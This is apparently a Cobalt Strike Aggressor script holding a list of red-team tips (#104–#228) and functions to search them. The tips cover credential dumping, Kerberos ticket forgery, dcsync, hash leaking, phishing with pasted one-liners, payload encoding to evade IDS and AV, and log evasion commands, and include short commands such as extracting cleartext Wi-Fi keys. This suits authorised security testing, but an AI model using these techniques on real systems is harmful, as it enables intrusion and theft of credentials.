%(tips => 'Red tip #104: SessionGopher does a decent job at retrieving putty and RDP history - https://github.com/fireeye/SessionGopher', tags => @(
'redtip', '#104', 'SessionGopher', 'putty', 'RDP', 'history'
)
),
%(tips => 'Red tip #105: If ping 8.8.8.8 works, try ICMP tunneling. More info at http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-5.html?m=1 from @fragsh3ll though only on immature network', tags => @(
'redtip', '#105', 'ping', 'ICMP', 'tunneling'
)
),
%(tips => 'Red tip #106: Wordlists? https://github.com/berzerk0/Probable-WordlistsI like to use the top probable 297 million list with Deadhobo rules', tags => @(
'redtip', '#106', 'Wordlists', 'rules', 'list'
)
),
%(tips => 'Red tip #107: More of a pentest tip but nslookup http://google.com if it resolves you may have a DNS tunneling problem.', tags => @(
'redtip', '#107', 'pentest', 'nslookup', 'DNS', 'tunneling'
)
),
%(tips => 'Red tip #108: Post exploitation Asset Discovery https://github.com/vysec/Invoke-DNSDiscovery looks for assets by name that might be good if youre low priv user.', tags => @(
'redtip', '#108', 'exploitation', 'asset', 'DNS', 'user'
)
),
%(tips => 'Red tip #109: Use Invoke-ProcessScan to give some running processes context on a system. This uses EQGRP leaked list- https://github.com/vysec/Invoke-ProcessScan', tags => @(
'redtip', '#109', 'process', 'scan', 'EQGRP'
)
),
%(tips => 'Red tip #110: Mature blue? Be careful and minidump lssas.exe then download it and parse locally', tags => @(
'redtip', '#110', 'mature', 'blue', 'minidump', 'lssas'
)
),
%(tips => 'Red tip #111: Found an exploitable S4U condition? Use Mistique to attack! https://github.com/machosec/Mystique/blob/master/Mystique.ps1', tags => @(
'redtip', '#111', 'S4U', 'Mistique'
)
),
%(tips => 'Red tip #112: Need to use VNC as RDP in use? https://github.com/artkond/Invoke-Vnc has been pretty stable for me. Run it then pivot in and connect!', tags => @(
'redtip', '#112', 'VNC', 'RDP', 'pivot'
)
),
%(tips => 'Red tip #113: Found super secret.doc or master password database.xlsx? Use office2john to get hash and crack in Hashcat!', tags => @(
'redtip', '#113', 'password', 'database', 'xlsx', 'hashcat'
)
),
%(tips => 'Red tip #114: PowerUp didnt work and you want to autoruns? Dont bother going on disk, use Invoke-AutoRuns to csv- https://github.com/p0w3rsh3ll/AutoRuns', tags => @(
'redtip', '#114', 'PowerUp', 'autoruns', 'powershell'
)
),
%(tips => 'Red tip #115: Need to zip up a directory quickly for easy exfiltration? Eg. Home shares https://github.com/thoemmi/7Zip4Powershell use Powershell', tags => @(
'redtip', '#115', 'zip', 'exfil', 'powershell'
)
),
%(tips => 'Red tip #116: Use CatMyFish to search for categorised domains that could be used in your engagements - https://github.com/Mr-Un1k0d3r/CatMyFish', tags => @(
'redtip', '#116', 'CatMyFish', 'domains', 'engagements'
)
),
%(tips => 'Red tip #117: Ran Invoke-MapDomainTrusts from PowerView? Use @harmj0y DomainTrustExplorer to generate a graph - https://github.com/sixdub/DomainTrustExplorer', tags => @(
'redtip', '#117', 'PowerView', 'domain', 'trust', 'graph'
)
),
%(tips => 'Red tip #118: FOCA finds some useful information for OSINT and intelligence phases. https://www.elevenpaths.com/labstools/foca/index.html', tags => @(
'redtip', '#118', 'FOCA', 'OSINT', 'intelligence'
)
),
%(tips => 'Red tip #119: GoPhish is a pretty useful tool for spinning up simple phishing campaigns especially for decoys https://getgophish.com', tags => @(
'redtip', '#119', 'GoPhish', 'tool', 'phishing', 'email', 'campaigns'
)
),
%(tips => 'Red tip #120: If you have write access to the orgs shared Office template folders You can privesc by backdooring these trusted documents.', tags => @(
'redtip', '#120', '', '', ''
)
),
%(tips => 'Red tip #121: @zwned uses netsh packet tracing to sniff natively from victim host. Save capture and analyze offline!', tags => @(
'redtip', '#121', 'netsh', 'packet', 'sniff', 'capture'
)
),
%(tips => 'Red tip #122: More decoy tips! Scan the external perimeter with tools like Nessus and OpenVAS. More traffic the better just to burn the blue', tags => @(
'redtip', '#122', 'decoy', 'external', 'perimeter', 'Nessus', 'OpenVAS'
)
),
%(tips => 'Red tip #123: Read Sean Metcalfa blog http://adsecurity.org/ When AD is used in many environments, it vital to at least know techniques', tags => @(
'redtip', '#123', 'AD', 'environments', 'techniques'
)
),
%(tips => 'Red tip #124: Remember you can generate a golden ticket offline with knowledge of krbtgt and rest offline. Golden ticket gets silver from DC', tags => @(
'redtip', '#124', 'golden', 'ticket', 'krbtgt', 'DC', 'silver'
)
),
%(tips => 'Red tip #125: Got krbtgt of a child domain? Forest parent trusts you? Use the SID history attack in golden tickets to escalate to Ent Admin', tags => @(
'redtip', '#125', 'krbtgt', 'domain', 'Forest', 'trust', 'SID', 'admin'
)
),
%(tips => 'Red tip #126: You dont necessarily need Domain Admin, if you have an account that has "Replicating directory changes", dcsync to pull hash', tags => @(
'redtip', '#126', 'domain', 'admin', 'account', 'dcsync', 'hash'
)
),
%(tips => 'Red tip #127: Planning to use secretsdump.py? :) Try using the DC machine account to authenticate and dump instead of a user! Save hash', tags => @(
'redtip', '#127', 'secretsdump', 'DC', 'machine', 'account', 'authenticate', 'dump', 'hash'
)
),
%(tips => 'Red tip #128: Use machine account hashes to generate silver tickets to a host for persistence. Save machine hash for DC incase krbtgt rotate', tags => @(
'redtip', '#128', 'machine', 'account', 'hashes', 'ticket', 'persistence', 'DC', 'krbtgt'
)
),
%(tips => 'Red tip #129: Use PEAS to query shares and emails if using ActiveSync - https://github.com/mwrlabs/peas', tags => @(
'redtip', '#129', 'PEAS', 'shares', 'emails', 'ActiveSync'
)
),
%(tips => 'Red tip #130: (Not red really but useful) Sort IPs: cat IPs.txt | sort -t . -k1,1 -k2,2 -k3,3 -k4,4', tags => @(
'redtip', '#130', 'IP', 'cat', 'sort'
)
),
%(tips => 'Red tip #131: Learn AWK and general bash scripting. Processing and merging of data sets speeds up our job for discovery and time keeping.', tags => @(
'redtip', '#131', 'AWK', 'bash', 'scripting', 'data'
)
),
%(tips => 'Red tip #132: Worth learning to pick locks and the dust can sensor trick if youre going to do some physical. http://www.artofmanliness.com/2014/11/19/how-to-pick-a-lock-pin-tumbler-locks/', tags => @(
'redtip', '#132', 'lock', 'dust', 'physical', 'pick'
)
),
%(tips => 'Red tip #133: Grep has an extract flag -o that can be used to extract from a regex. Good for extracting data from massive blobs.', tags => @(
'redtip', '#133', 'grep', 'flag', 'regex', 'blobs'
)
),
%(tips => 'Red tip #134: Victims use wireless? Use KARMA attack to force them onto your network. Use eternalblue, domain creds or other vulns to get in. https://github.com/sensepost/mana', tags => @(
'redtip', '#134', 'wireless', 'KARMA', 'network', 'eternalblue', 'domain'
)
),
%(tips => 'Red tip #135: Phishing pages are usually custom. However its always good to have a stash for decoys. Generic Gmail, Office365?', tags => @(
'redtip', '#135', 'phishing', 'decoy', 'gmail', 'Office365'
)
),
%(tips => 'Red tip #136: Keep up to date by watching presentations from conferences on YouTube :) Discover useful techniques', tags => @(
'redtip', '#136', 'presentation', 'conferences', 'YouTube'
)
),
%(tips => 'Red tip #137: If youve exhausted all payload types, try sending a Mac user a python one liner and Win PS 1 liner. Ive had people run it.', tags => @(
'redtip', '#137', 'payload', 'Mac', 'python', 'one-liner'
)
),
%(tips => 'Red tip #139: If you need to get a clean EXE for file drop and exec, try out @midnite_runr Backdoor Factory - https://github.com/secretsquirrel/the-backdoor-factory', tags => @(
'redtip', '#139', 'EXE', 'file', 'backdoor', 'factory'
)
),
%(tips => 'Red tip #140: If enemy does not use proxy with TLS inspection then you can use https://www.mdsec.co.uk/2017/02/domain-fronting-via-cloudfront-alternate-domains/ to mask your c2 channel further', tags => @(
'redtip', '#140', 'proxy', 'TLS', 'c2', 'domains'
)
),
%(tips => 'Red tip #141: On a Linux box and want to egress from it over a proxy? Use ProxyTunnel to pipe SSH - https://github.com/proxytunnel/proxytunnel', tags => @(
'redtip', '#141', 'linux', 'egress', 'proxy', 'Tunnel', 'SSH'
)
),
%(tips => 'Red tip #142: Need some OSINT? Keep Spiderfoot running long term to accompany your manual OSINT sources http://www.spiderfoot.net', tags => @(
'redtip', '#142', 'OSINT', 'Spiderfoot'
)
),
%(tips => 'Red tip #143: OSINTing? TheHarvester does a decent job at subdomains. Though theres better ways to get emails bulk. https://github.com/laramies/theHarvester', tags => @(
'redtip', '#143', 'OSINT', 'Harvester', 'subdomains', 'emails'
)
),
%(tips => 'Red tip #144: Exploring and want to use WMI? https://www.microsoft.com/en-us/download/details.aspx?id=8572 is pretty useful for exploring the different namespaces and classes.', tags => @(
'redtip', '#144', 'WMI', 'namespace', 'classes'
)
),
%(tips => 'Red tip #145: Need to reset a password? Do it then quickly dcsync for previous password hash and use NTLMinject - https://github.com/vletoux/NTLMInjector', tags => @(
'redtip', '#145', 'password', 'dcsync', 'hash', 'NTLM', 'inject'
)
),
%(tips => 'Red tip #146: IDS flagging known payload binary blob? Base64 encode it in your payload and use certutil, PS or VB to decode it!', tags => @(
'redtip', '#146', 'IDS', 'payload', 'binary', 'base64', 'certutil'
)
),
%(tips => 'Red tip #147: Test your phishing campaigns before sending!!!', tags => @(
'redtip', '#147', 'phishing', 'campaign', 'email'
)
),
%(tips => 'Red tip #148: If youre sending into Exchange, make sure your SMTP server is not in SPAM list or black lists. Check junk mails mail headers', tags => @(
'redtip', '#148', 'Exchange', 'SMTP', 'SPAM', 'email'
)
),
%(tips => 'Red tip #149: Use Microsofts Message Header Analyzer to parse and review email headers from Outlook. https://testconnectivity.microsoft.com/MHA/Pages/mha.aspx', tags => @(
'redtip', '#149', 'Microsoft', 'message', 'email', 'Outlook'
)
),
%(tips => 'Red tip #150: Make sure phishing emails Bounce header matches From. Or else some will flag as malicious.', tags => @(
'redtip', '#150', 'phishing', 'emails', 'flag', 'header'
)
),
%(tips => 'Red tip #151: DomainHunter also looks for good candidate expired domains - https://github.com/minisllc/domainhunter', tags => @(
'redtip', '#151', 'Domain', 'Hunter', 'domains'
)
),
%(tips => 'Red tip #152: Want to scrape MetaData in CLI? Use PowerMeta. Linux users can use PowerShell too! https://github.com/dafthack/PowerMeta', tags => @(
'redtip', '#152', 'MetaData', 'CLI', 'linux', 'PowerShell'
)
),
%(tips => 'Red tip #153: RDP in use? Dont want to use VNC? Try mimikatzs ts::multirdp in memory patch by @gentilkiwi', tags => @(
'redtip', '#153', 'RDP', 'VNC', 'mimikatz', 'memory'
)
),
%(tips => 'Red tip #154: Admin on a machine with VPN client? certificate extraction using Mimikatz by @gentilkiwi. Dont forget to dl configs. Backdoor', tags => @(
'redtip', '#154', 'Admin', 'machine', 'VPN', 'certificate', 'mimikatz', 'backdoor'
)
),
%(tips => 'Red tip #155: Master all the quick wins to Domain privilege escalation. When youre pressured to get DA in 15 mins, you want to know you can', tags => @(
'redtip', '#155', 'domain', 'privesc', 'DA', 'escalation'
)
),
%(tips => 'Red tip #156: @Akijos notes that we should be careful when using silver tickets with scheduled tasks. Author is the user account youre on.', tags => @(
'redtip', '#156', 'silver', 'tickets', 'account', 'user'
)
),
%(tips => 'Red tip #157: If you dont need a golden ticket, dont generate it.', tags => @(
'redtip', '#157', 'golden', 'ticket', 'generate'
)
),
%(tips => 'Red tip #158: Scan a DNS server for Alexa top 1 million spoofable domains :) Ive got a massive list, do you?', tags => @(
'redtip', '#158', 'DNS', 'server', 'Alexa', 'domains'
)
),
%(tips => 'Red tip #159: Scan the internet for a list of domain frontable domains! Ive got a big big list ready for whenever I want to use them :)', tags => @(
'redtip', '#159', 'scan', 'internet', 'domain', 'fronting'
)
),
%(tips => 'Red tip #160: We all know people share credentials between different services. Try these credentials on other accounts owned by the user!', tags => @(
'redtip', '#160', 'credentials', 'services', 'accounts', 'user'
)
),
%(tips => 'Red tip #161: Cant crack a password? Try the users previous passwords from history in AD. They may follow a pattern.', tags => @(
'redtip', '#161', 'password', 'crack', 'history', 'AD'
)
),
%(tips => 'Red tip #162: Cant crack a hash owned by a user? Take all previously discovered passwords from their files and generate a new word list.', tags => @(
'redtip', '#162', 'hash', 'crack', 'password', 'files', 'wordlist'
)
),
%(tips => 'Red tip #163: Cant crack a password? Make sure these are in your word list: name of company, town, capital, country, months! Appear a lot.', tags => @(
'redtip', '#163', 'crack', 'password', 'wordlist'
)
),
%(tips => 'Red tip #164: Didier Stevens has SelectMyParent tool that lets you spawn a child process with an arbitrary parent. https://blog.didierstevens.com/2017/03/20/that-is-not-my-child-process/', tags => @(
'redtip', '#164', 'tool', 'SelectMyParent', 'process', 'parent'
)
),
%(tips => 'Red tip #165: Using SelectMyParent stops those detections eg. powershell.exe spawning cmd.exe. @armitagehackers CobaltStrike has ppid cmd!', tags => @(
'redtip', '#165', 'powershell.exe', 'cmd.exe', 'detections', 'CobaltStrike'
)
),
%(tips => 'Red tip #166: Use PowerPoint mouse over text to invoke a powershell command one liner. #adversarysimulation - https://www.dodgethissecurity.com/2017/06/02/new-powerpoint-mouseover-based-downloader-analysis-results/', tags => @(
'redtip', '#166', 'PowerPoint', 'powershell', 'one-liner', 'adversary'
)
),
%(tips => 'Red tip #167: Follow @mattifestation to keep up to date with blue team advances. Just in case blue is actually up to date with mitigations!', tags => @(
'redtip', '#167', 'mitigation', 'mattifestation', 'blue', 'team'
)
),
%(tips => 'Red tip #168: Using VBS or JS? Cant stage using PowerShell.exe as blocked? @Cneelis released https://github.com/Cn33liz/StarFighters so you can keep use PS', tags => @(
'redtip', '#168', 'VBS', 'JS', 'powershell', 'stage', 'StarFighters'
)
),
%(tips => 'Red tip #169: Not sure who uses Wi-Fi webcams but go run a mass deauth attack if youre going to plan on breaking in physically to discon', tags => @(
'redtip', '#169', 'WiFi', 'webcam', 'deauth', 'physical'
)
),
%(tips => 'Red tip #170: @malcomvetter Never use defaults - run Mimikatz with AES and 8 hour tickets to avoid passive detection from NG defense tools!', tags => @(
'redtip', '#170', '', '', ''
)
),
%(tips => 'Red tip #171: Win XP doesnt have PowerShell? Try using Unmanaged powershell to keep using your favourite scripts!', tags => @(
'redtip', '#171', 'XP', 'powershell', 'unmanaged', 'scripts'
)
),
%(tips => 'Red tip #172: @anthonykasza tells us that the at.exe command takes base64 encoded Params! Eg. at.exe b64::[encoded params]', tags => @(
'redtip', '#172', 'at', 'command', 'base64', 'encoded'
)
),
%(tips => 'Red tip #173: Grab cleartext wireless keys: netsh wlan show profile name="ssid" key=clear', tags => @(
'redtip', '#173', 'wireless', 'netsh', 'wlan', 'ssid'
)
),
%(tips => 'Red tip #174: Got a shell on a victim without admin? Want their creds? Try Inveigh then rpcping -s 127.0.0.1 -t ncacn_np to leak hash.', tags => @(
'redtip', '#174', 'shell', 'admin', 'creds', 'Inveigh', 'rpcping'
)
),
%(tips => 'Red tip #175: Got a low priv shell and need creds? Use Invoke-LoginPrompt by @enigma0x3 https://raw.githubusercontent.com/enigma0x3/Invoke-LoginPrompt/master/Invoke-LoginPrompt.ps1', tags => @(
'redtip', '#175', 'shell', 'creds', 'Login', 'Prompt'
)
),
%(tips => 'Red tip #176: Get access to shadow admin accounts, they can DCsync and are essentially DA. https://www.cyberark.com/threat-research-blog/shadow-admins-stealthy-accounts-fear/', tags => @(
'redtip', '#176', 'access', 'shadow', 'admin', 'accounts', 'dcsync', 'DA'
)
),
%(tips => 'Red tip #177: If blue detects PTH. Try extract Kerberos tickets and PTT.', tags => @(
'redtip', '#177', 'blue', 'PTH', 'kerberos', 'tickets', 'PTT'
)
),
%(tips => 'Red tip #178: @lefterispan wrote https://gist.github.com/leftp/a3330f13ac55f584239baa68a3bb88f2 … which sets up a proxy and forces an auth attempt to it to leak hash. Low priv leak.', tags => @(
'redtip', '#178', 'proxy', 'auth', 'hash'
)
),
%(tips => 'Red tip #179: When creating phishing pages, try cloning and modifying parts of the client’s own webpages. For example of their VPN login!', tags => @(
'redtip', '#179', 'phish', 'cloning', 'webpage', 'VPN', 'login'
)
),
%(tips => 'Red tip #180: Regardless of whether there are known defenses. Run your PS scripts through Obfuscation before loading into memory.', tags => @(
'redtip', '#180', 'defenses', 'powershell', 'scripts', 'Obfuscation', 'memory'
)
),
%(tips => 'Red tip #181: Stuck trying to find those assets still? Try @424f424f Get-BrowserData https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/master/Get-BrowserData.ps1', tags => @(
'redtip', '#181', 'assets', 'Browser', 'data', 'powershell'
)
),
%(tips => 'Red tip #182: Follow @JohnLaTwC as he tweets phishing examples and sometimes with new techniques used in Wild. Good for adversary simulation', tags => @(
'redtip', '#182', 'phishing', 'adversary', 'simulation'
)
),
%(tips => 'Red tip #183: @MrUn1k0d3r released https://github.com/Mr-Un1k0d3r/SCT-obfuscator … can probably bypass Gateway signatures when performing SCT delivery for regsvr32! https://github.com/Mr-Un1k0d3r/SCT-obfuscator', tags => @(
'redtip', '#183', 'SCT', 'bypass', 'delivery', 'regsvr32'
)
),
%(tips => 'Red tip #184: We always talk about Windows and AD. But now let’s have a look at Linux and AD with https://medium.com/@br4nsh/from-linux-to-ad-10efb529fae9', tags => @(
'redtip', '#184', 'windows', 'AD', 'linux'
)
),
%(tips => 'Red tip #185: Use WSUS for lateral movement https://github.com/AlsidOfficial/WSUSpendu/blob/master/WSUSpendu.ps1', tags => @(
'redtip', '#185', 'WSUS', 'lateral movement', 'pivot'
)
),
%(tips => 'Red tip #186: View @jpcert https://www.jpcert.or.jp/english/pub/sr/20170612ac-ir_research_en.pdf … and look at all those indicators and artifacts left behind. Then hexedit those tools :+1:', tags => @(
'redtip', '#186', 'artifacts', 'research', 'hexedit'
)
),
%(tips => 'Red tip #187: Found a portal using 2FA? Using RSA SecureID? https://blog.netspi.com/targeting-rsa-emergency-access-tokencodes-fun-profit/ … Pin bruteforce!', tags => @(
'redtip', '#187', 'portal', 'web', 'secureID'
)
),
%(tips => 'Red tip #188: @pwnagelabs says to avoid bash history on exit using: kill -9 $$', tags => @(
'redtip', '#188', 'bash', 'history', 'kill'
)
),
%(tips => 'Red tip #189: @pwnagelabs teaches us how to avoid wtmp logging with: ssh -l user target -T', tags => @(
'redtip', '#189', 'wtmp', 'logging', 'ssh'
)
),
%(tips => 'Red tip #190: @bluscreenofjeff shows us how to use Apache Mod rewrite to randomly serve different payloads https://bluescreenofjeff.com/2017-06-13-serving-random-payloads-with-apache-mod_rewrite/', tags => @(
'redtip', '#190', 'Apache', 'payload', 'rewrite', 'jeff'
)
),
%(tips => 'Red tip #191: Domain user? Query LDAP for Printers. Attempt default creds or known vulns then read Service account creds, hash or relay', tags => @(
'redtip', '#191', 'domain', 'LDAP', 'Printers', 'creds', 'vulns', 'account', 'hash'
)
),
%(tips => 'Red tip #192: Get-WmiObject -Class MicrosoftDNS_AType -NameSpace Root\MicrosoftDNS -ComputerName DC001 | Export-CSV -not dns.csv', tags => @(
'redtip', '#192', 'gmwi', 'wmi', 'DNS', 'csv'
)
),
%(tips => 'Red tip #193: Password protected doc in email? For some reason a lot of people send the password separately to the same inbox. #epicfail', tags => @(
'redtip', '#193', 'password', 'doc', 'email', 'inbox'
)
),
%(tips => 'Red tip #194: Can’t see another part of the network and there’s a DC? Pivot off the DC :)', tags => @(
'redtip', '#194', 'network', 'DC', 'pivot'
)
),
%(tips => 'Red tip #195: C:\windows\system32\inetsrv\appcmd list site to find IIS bindings.', tags => @(
'redtip', '#195', 'appcmd', 'IIS'
)
),
%(tips => 'Red tip #196: DA -> Locate DB -> Found MSSQL? https://github.com/NetSPI/PowerUpSQL use PowerUpSQL to enumerate and privesc by stealing tokens.', tags => @(
'redtip', '#196', 'DA', 'DB', 'MSSQL', 'PowerUpSQL', 'enumerate', 'privesc'
)
),
%(tips => 'Red tip #197: If ACL doesn’t let you read other users’ home shares, you can try net view \fileserv /all to try other shares and folders!', tags => @(
'redtip', '#197', 'ACL', 'shares', 'net', 'view', 'folders'
)
),
%(tips => 'Red tip #198: Username jondoe and jondoe-x? Ones an Admin? Try same password. May be shared :sunglasses: repeat for entire user list.', tags => @(
'redtip', '#198', 'username', 'Admin', 'password', 'shared', 'list'
)
),
%(tips => 'Red tip #199: Failed to phish? Payloads failing? Mac users? Write an email and ask them to open terminal and paste in python Empyre one line', tags => @(
'redtip', '#199', 'phish', 'payload', 'mac', 'users', 'email', 'python', 'Empyre'
)
),
%(tips => 'Red tip #200: @_wald0 blessed us with this BH cypher query to skip specific nodes to look for other paths. https://pastebin.com/qAzH9uji', tags => @(
'redtip', '#200', 'BH', 'cypher', 'nodes'
)
),
%(tips => 'Red tip #201: @424f424f pushed some research into LNK files inside CAB can be used to bypass the Attachment Manager :+1:http://www.rvrsh3ll.net/blog/informational/bypassing-windows-attachment-manager/', tags => @(
'redtip', '#201', 'research', 'LNK', 'CAB', 'bypass'
)
),
%(tips => 'Red tip #202: When domain fronting, your calls hit the edge node, so every domain you use potentially hits a different a IP! :sunglasses:', tags => @(
'redtip', '#202', 'domain', 'fronting', 'IP', 'node'
)
),
%(tips => 'Red tip #203: If using @Cneelis StarFighter. Instead of using a staged web delivery, just stick while stageless payload as encoded block in!', tags => @(
'redtip', '#203', 'StarFighter', 'web', 'delivery', 'payload', 'encoded'
)
),
%(tips => 'Red tip #204: Printers are often good MAC addresses to use to beat NAC when physical red teaming as printers (mostly?) don’t support 802.1x', tags => @(
'redtip', '#204', 'Printers', 'MAC', 'addresses', '802.1x'
)
),
%(tips => 'Red tip #205: If proxy is blocking SCT file, replace with and add around the rest. Thx @subTee', tags => @(
'redtip', '#205', 'proxy', 'SCT', 'file'
)
),
%(tips => 'Red tip #206: CobaltStrike VNC not working? Here is a workaround using @artkond Invoke-VNC https://github.com/vysec/Aggressor-VYSEC/blob/master/vnc-psh.cna', tags => @(
'redtip', '#206', 'cobaltstrike', 'VNC', 'Invoke-VNC'
)
),
%(tips => 'Red tip #207: Got C2 on Windows user but no credentials? Leak a hash using @leftp code. Implemented into CNA https://github.com/vysec/Aggressor-VYSEC/blob/master/Invoke-CredLeak.ps1', tags => @(
'redtip', '#207', 'C2', 'windows', 'user', 'credentials', 'hash'
)
),
%(tips => 'Red tip #208: @Nebulator spoke on IP regex by IR at #SnoopCon. @armitagehacker CNA to automate https://github.com/vysec/Aggressor-VYSEC/blob/master/ping.cna', tags => @(
'redtip', '#208', 'IP', 'regex', 'IR', 'ping', 'cna'
)
),
%(tips => 'Red tip #209: Automate environment prepping and spawn all processes as a child of explorer.exe by @armitagehacker https://github.com/vysec/Aggressor-VYSEC/blob/master/auto-prepenv.cna', tags => @(
'redtip', '#209', 'automate', 'environment', 'processes', 'explorer.exe'
)
),
%(tips => 'Red tip #210: @subTee highlighted to us that XML requests can be used as a download cradle in constrained language mode!', tags => @(
'redtip', '#210', 'XML', 'download', 'cradle', 'language'
)
),
%(tips => 'Red tip #211: Check out @armitagehacker post on OPSEC considerations when using a CobaltStrike beacon. https://blog.cobaltstrike.com/2017/06/23/opsec-considerations-for-beacon-commands/', tags => @(
'redtip', '#211', 'cobaltstrike', 'beacon', 'opsec'
)
),
%(tips => 'Red tip #212: Reset AD passwords from Linux with @mubix https://room362.com/post/2017/reset-ad-user-password-with-linux/ :) proxychains it over your pivot :D', tags => @(
'redtip', '#212', 'AD', 'password', 'linux', 'proxychains', 'pivot'
)
),
%(tips => 'Red tip #213: Got a NetNTLMv1 hash? Convert it to NTLM by cracking three DES keys: https://hashcat.net/forum/thread-5912.html', tags => @(
'redtip', '#213', 'NTLM', 'hash', 'cracking', 'DES'
)
),
%(tips => 'Red tip #214: If you don’t 100 percent understand NETNTLMv1 and v2 read up on https://blog.smallsec.ca/2016/11/21/ntlm-challenge-response/', tags => @(
'redtip', '#214', 'NTLM', 'NTLMv2', 'blog', 'hashing'
)
),
%(tips => 'Red tip #215: If you don’t know how LM and NTLM hashing works... go back to basics with https://blog.smallsec.ca/2016/11/07/windows-credentials/', tags => @(
'redtip', '#215', 'LM', 'NTLM', 'hashing', 'windows', 'credentials'
)
),
%(tips => 'Red tip #216: @424f424f just made me aware that FireEye can prevent runas from executing. Use unmanaged PS to spawn https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/master/RunAs.ps1', tags => @(
'redtip', '#216', 'FireEye', 'runas', 'unmanaged', 'powershell'
)
),
%(tips => 'Red tip #217: S4U can be used to delegate across SPN. So if you have msds-allowedtodelagateto HTTP you can exploit to obtain HOST and CIFS', tags => @(
'redtip', '#217', 'S4U', 'SPN', 'HTTP', 'host', 'CIFS'
)
),
%(tips => 'Red tip #218: You’re in a subnet where people RDP into but you can’t attack outwards? Set backdoor over tsclient on start keys. :sunglasses:', tags => @(
'redtip', '#218', 'subnet', 'RDP', 'backdoor', 'tsclient'
)
),
%(tips => 'Red tip #219: Unsure what the localised admin account might be called or need to copy and paste? Check out https://social.technet.microsoft.com/wiki/contents/articles/13813.localized-names-for-administrator-account-in-windows.aspx', tags => @(
'redtip', '#219', 'admin', 'account', 'windows', 'copy', 'paste'
)
),
%(tips => 'Red tip #220: EDR monitoring “whoami”? Use echo %userprofile%; echo %username%. Or replace echo with anything that reflects error: ie. set', tags => @(
'redtip', '#220', 'EDR', 'whoami', 'echo', 'environment variables', 'set'
)
),
%(tips => 'Red tip #221: Network segregation in play? Try Get-NetSubnet, Get-NetSite in PowerView or browse in AD explorer. Can help find your way :)', tags => @(
'redtip', '#221', 'Network', 'segregation', 'Netsite', 'PowerView', 'AD'
)
),
%(tips => 'Red tip #222: If you want to simulate MBR activity like #Petya, check out https://github.com/PowerShellMafia/PowerSploit/blob/master/Mayhem/Mayhem.psm1', tags => @(
'redtip', '#222', 'MBR', 'Petya', 'Mayhem', 'activity'
)
),
%(tips => 'Red tip #223: Secure your beach heads against #Petya WMIC /node:host process call create “echo > C:\windows\perfc”', tags => @(
'redtip', '#223', 'wmic', 'Petya', 'host', 'process', 'echo'
)
),
%(tips => 'Red tip #224: Using Linux? Modify /etc/dhcp/dhclient.conf and remove gethostname() for Opsec when you VPN or have to rock up on site.', tags => @(
'redtip', '#224', 'linux', 'dhcp', 'opsec', 'VPN', 'site'
)
),
%(tips => 'Red tip #225: Stuck in a heavily segregated situation on a server? Try RDPInception attack vector out https://www.mdsec.co.uk/2017/06/rdpinception/', tags => @(
'redtip', '#225', 'segregated', 'server', 'RDP',
)
),
%(tips => 'Red tip #226: Reduce AV detection by using fake Microsoft certificate.', tags => @(
'redtip', '#226', 'AV', 'microsoft', 'certificate', 'detection'
)
),
%(tips => 'Red tip #227: Not using notifications yet for C2 events? For @armitagehacker Cobalt Strike check out', tags => @(
'redtip', '#227', 'notifications', 'C2', 'events', 'CobaltStrike'
)
),
%(tips => 'Red tip #228: Need a fully fledged phishing framework? Check out the amazing Fierce Phish by @Raikiasec <3 https://github.com/Raikia/FiercePhish', tags => @(
'redtip', '#228', 'phishing', 'framework', 'FiercePhish', 'King', 'Raikiasec'
)
),
);
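# Return the built-in command definitions.
#
# reload_defs() calls this and assigns the result back to the global
# @database before appending the custom entries from defs.bin. Because this
# hands back the @database reference itself rather than a fresh copy, a
# second reload_defs() would append the custom entries again — TODO confirm
# how @database is first populated (its definition is not in this file
# section). The former trailing `return @tips;` was unreachable and is gone.
sub get_database {
    return @database;
}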
# csfm.cna
# Your friendly red team operator's guide to the galaxy
#
# 001SPARTaN and r3dQu1nn
# Script-wide state shared by the subs and aliases below:
#   @database - searchable command entries, filled by reload_defs()
#   @results  - hits of the most recent search()/tip(), read back by runcmd
#   @customs  - operator-added entries, persisted to defs.bin by add_def()
global('@database @results @customs');
@customs = @(); # Any custom definitions
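# Search the global @database for $1 and fill the global @results.
#   - an empty term or '*' returns every entry;
#   - otherwise an entry matches when the lowercased term equals one of its
#     tags, or is a case-insensitive substring of its "cmd" text.
# The term is compared literally rather than being interpolated into a regex,
# so characters such as '(' or '\' in a search term can no longer break the
# match. Every hit gets a 1-based "index" key that runcmd uses to pick it out
# of @results again.
sub search {
    local('$index $arg $term %entry $tag @lctags $matched');
    clear(@results); # Make sure no leftovers from a previous search
    $arg = $1;
    $term = lc($arg);
    println("Searching for $arg");
    $index = 1;
    # Iterate through all entries in the database
    foreach %entry (@database) {
        # Lowercase every tag so tag matching is case-insensitive
        @lctags = @();
        foreach $tag (%entry["tags"]) {
            add(@lctags, lc($tag), -1);
        }
        $matched = 0;
        if (($arg eq $null) || ($arg eq '*')) {
            # Empty term or '*': return all entries
            $matched = 1;
        }
        else if ($term in @lctags) {
            println("Found result: " . %entry);
            $matched = 1;
        }
        else if ((%entry["cmd"] !is $null) && (indexOf(lc(%entry["cmd"]), $term) !is $null)) {
            # Partial, literal match against the command text
            println("Found result (cmd match): " . %entry);
            $matched = 1;
        }
        if ($matched) {
            %entry["index"] = $index;
            add(@results, %entry, -1);
            $index++;
        }
    }
}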
# Same search function as before, but only looks for tips
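# Same as search(), but over the global @tips: an entry matches on an empty
# term or '*', on a lowercased tag equal to the term, or on a case-insensitive
# literal substring of its "tips" text. Hits are appended to the global
# @results with a 1-based "index" key.
sub tip {
    local('$index $arg $term %entry $tag @lctags $matched');
    clear(@results); # Drop the previous search's results
    $arg = $1;
    $term = lc($arg);
    println("Searching for $arg");
    $index = 1;
    foreach %entry (@tips) {
        # Lowercase every tag so tag matching is case-insensitive
        @lctags = @();
        foreach $tag (%entry["tags"]) {
            add(@lctags, lc($tag), -1);
        }
        $matched = 0;
        if (($arg eq $null) || ($arg eq '*')) {
            $matched = 1;
        }
        else if ($term in @lctags) {
            println("Found result: " . %entry);
            $matched = 1;
        }
        else if ((%entry["tips"] !is $null) && (indexOf(lc(%entry["tips"]), $term) !is $null)) {
            # Literal substring match on the tip text (the term is not a regex)
            println("Found result (tip match): " . %entry);
            $matched = 1;
        }
        if ($matched) {
            %entry["index"] = $index;
            add(@results, %entry, -1);
            $index++;
        }
    }
}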
# Reload definitions from defs.cna and defs.bin
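# Rebuild @database from the built-in definitions plus the custom entries
# stored in defs.bin (an array serialized with writeObject in add_def).
#
# defs.bin is only read when it exists, so the very first load (before any
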